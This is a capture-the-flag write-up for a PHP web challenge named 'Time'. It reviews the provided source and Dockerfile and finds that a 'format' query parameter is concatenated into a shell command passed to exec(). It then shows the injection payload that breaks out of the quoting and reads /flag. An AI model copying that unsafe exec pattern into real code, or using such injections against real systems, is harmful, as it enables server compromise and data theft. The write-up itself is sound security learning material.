# Time

Challenge: Time

Category: Web

Get the current date and time, anytime, anywhere!

<figure><img src="https://382757542-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FfAxmqRz869b0dQQ6DjHW%2Fuploads%2FvDArTJg1qn4t2vmg8rhP%2F2.png?alt=media&#x26;token=b532f4c5-52e0-473d-a089-66b4154ce5c7" alt=""><figcaption></figcaption></figure>

I notice that it changed when I click the What’s the date? menu.

<figure><img src="https://382757542-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FfAxmqRz869b0dQQ6DjHW%2Fuploads%2FKxwOAg9kkXBGJ3mCAUj5%2F3.png?alt=media&#x26;token=94e3409e-8d5a-4980-840b-72ff3f4a80ae" alt=""><figcaption></figcaption></figure>

Since it's a web challenge, I thought of a possible code injection vulnerability.

They provided a source code:

```
web_time
├── build_docker.sh
├── challenge
│   ├── assets
│   │   └── favicon.png
│   ├── controllers
│   │   └── TimeController.php
│   ├── index.php
│   ├── models
│   │   └── TimeModel.php
│   ├── Router.php
│   ├── static
│   │   └── main.css
│   └── views
│       └── index.php
├── config
│   ├── fpm.conf
│   ├── nginx.conf
│   └── supervisord.conf
├── Dockerfile
└── flag
```

First, I checked the directory structure, so it's MVC since we have controller, model, and views folders. Second, I checked the Dockerfile and build it inside my machine, and examine what is the docker image, command used and where’s the flag located.

```
FROM debian:buster-slim

# Setup user
RUN useradd www

# Install system packeges
RUN apt-get update && apt-get install -y supervisor nginx lsb-release wget

# Add repos
RUN wget -O /etc/apt/trusted.gpg.d/php.gpg https://packages.sury.org/php/apt.gpg
RUN echo "deb https://packages.sury.org/php/ $(lsb_release -sc) main" | tee /etc/apt/sources.list.d/php.list

# Install PHP dependencies
RUN apt update && apt install -y php7.4-fpm

# Configure php-fpm and nginx
COPY config/fpm.conf /etc/php/7.4/fpm/php-fpm.conf
COPY config/supervisord.conf /etc/supervisord.conf
COPY config/nginx.conf /etc/nginx/nginx.conf

# Copy challenge files
COPY challenge /www

# Setup permissions
RUN chown -R www:www /www /var/lib/nginx

# Copy flag
COPY flag /flag

# Expose the port nginx is listening on
EXPOSE 80

# Populate database and start supervisord
CMD /usr/bin/supervisord -c /etc/supervisord.conf
```

I found that the flag is located in /flag path, but they provided a sample flag inside their source code:

<figure><img src="https://382757542-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FfAxmqRz869b0dQQ6DjHW%2Fuploads%2FVERO5W1T1OuvesnFfgaO%2F4.png?alt=media&#x26;token=4fbb0b13-620e-4209-a5a8-92aacf3a20b7" alt=""><figcaption></figcaption></figure>

Next is I checked controllers/TimeController.php

```php
<?php
class TimeController
{
    public function index($router)
    {
        $format = isset($_GET['format']) ? $_GET['format'] : '%H:%M:%S';
        $time = new TimeModel($format);
        return $router->view('index', ['time' => $time->getTime()]);
    }
}
```

This indicated that the Controller called/created the object TimeModel, so I checked the models/TimeModel.php

```php
<?php
class TimeModel
{
    public function __construct($format)
    {
        $this->command = "date '+" . $format . "' 2>&1";
    }

    public function getTime()
    {
        $time = exec($this->command);
        $res  = isset($time) ? $time : '?';
        return $res;
    }
}
```

I found `$this->command = “date ‘+” . $format . “‘ 2>&1”;`

This means that we need to inject command (command injection vulnerability) We can break out the string by adding a single quote (‘) and add a semi-colon(;)

I make an easy request using Burpsuite:

`/?format='; cat ' ../flag`

<figure><img src="https://382757542-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FfAxmqRz869b0dQQ6DjHW%2Fuploads%2FYbAabhRU5NrByFYJz41R%2F5.png?alt=media&#x26;token=f7e7f971-b2ce-49b7-b4b5-1ece53e06762" alt=""><figcaption></figcaption></figure>

Gotcha, I found a flag!!!